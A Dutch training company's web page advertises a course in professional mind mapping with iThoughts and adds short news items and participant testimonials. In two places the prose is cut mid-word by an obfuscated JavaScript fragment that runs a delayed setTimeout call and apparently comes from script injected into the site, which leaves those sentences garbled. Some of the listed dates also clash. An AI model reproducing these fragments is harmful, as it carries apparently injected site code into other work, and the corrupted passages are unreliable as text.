Woensdag 17 januari in Arnhem.

De training Professioneel Mindmappen met iThoughts wordt nu ook aangeboden voor zowel de Mac-computers als de Windows-computers. Doordat  iThoughts nu beschikbaar is voor zowel de iPad, Mac-computers en de Windows-computers, kunnen wij de gewenste incompany- maatwerktrainingen verzorgen.

 

Mindmappen
maakt je slimmer

Je hebt vast vaak goede ideeën. Daar ben ik zeker van! Het kan soms lastig zijn om deze goede ideeën ook echt duidelijk op papier te krijgen. Je gaat het uitschrijven, maar komt niet echt verder. Dan probeer je een lijstje te maken, maar ook hier stopt het na 5 punten en leg je het aan de kant.
Dat is natuurlijk heel erg zonde!
Een goede manier om dit aan te pakken is het maken van een mindmap. Een mindmap is eigenlijk gewoon een dump van je brein. Het helpt je om beter te onthouden, sneller overzicht te krijgen en heel belangrijk: verbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden leggen.

Wie wil dat niet?
Sneller denken en plannen?
Meer tijd voor sociale contacten?
Geen oeverloze discussies over wat we nu precies bedoelen?
De zoveelste opmerking op het vergaderverslag?
Meer tijd om je werk goed te kunnen uitvoeren?
Minimaal 10% van je werkdruk afhalen?

Leer mindmappen
Maak een Mindmap. Sleutelwoorden en afbeeldingen worden in verschillende kleuren op papier gezet of nog beter, direct tijdens overleg invoeren op je iPad. Elk element roept nieuwe gedachten, ideeën en specifieke herinneringen op. Een handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig hulpmiddel om complexe informatie te structureren en gedachten te ordenen. Om zo op creatieve manier projecten, vergaderingen, nieuwe ideeën en presentaties voor te bereiden. Een idee, concept of plan krijgt met een Mindmap eenvoudig en tot in detail vorm.

Wie slim is gaat mindmappen.

laatste nieuws

Paspoort naar succes 15 juli 2021 in Arnhem 11 juli 2019

Waar een wil is maken we een weg! Ben jij klaar om eens op […]

lees meer
Van werkstress naar werkplezier 15 januari 2018

Woensdag 16 juni 2021 in Arnhem. De inspirerende training “Van werkstress naar werkplezier”. Wie […]

lees meer

reacties van deelnemers

Genoten van de reis die ik met jou heb mogen maken. Genoten van jouw drive en bovenal de unieke boodschap die je brengt.
Voor elke reis heb je een paspoort nodig. Bij die met jou is dat niet anders. Het was een reis die langs verschillende aandachtspunten gaat. Met name om te leren dat we meer in onze mars hebben dan we in eerste instantie denken. Het is een reis waarbij de Nederlandse nuchterheid, bescheidenheid achterwege gelaten mag worden.
We mogen, moeten volledig uit onze schulp komen! 't Wordt zo een reis die de zelfkennis vergroot. Dat is op zijn beurt de kennis die van belang is om je optimaal te kunnen presenteren bij een broodheer. Met je fysieke paspoort in de handen gevuld met persoonlijke kwaliteiten kan de reid dan ook maar een eindpunt hebben, "SUCCES". The place to-be.

Jos Brunink | Realization of Improvements

Geert is als een frisse wind, hij laat je op een ondersteboven-, achterstevoren-manier kijken naar alledaagse zaken. Kijken op een manier die je al sinds je kindertijd afgeleerd hebt, heerlijk! Hij is als trainer één brok energie en inspireert als geen ander. Ik kan iedereen aanraden bij hem een workshop te volgen.

Liesbeth ter Braak | ANT Neuro BV

Power, energie, anders denken, bevlogen. Met recht iemand die kan inspireren om het anders te doen. Niet voor niets begint zijn presentatie met: als je doet wat je altijd deed, krijg je wat je altijd kreeg. Ik kreeg energie en vooral de behoefte om het anders te doen, niet morgen, maar nu!

Janneke Knuiman | Facilitair manager
aanmelden nieuwsbrief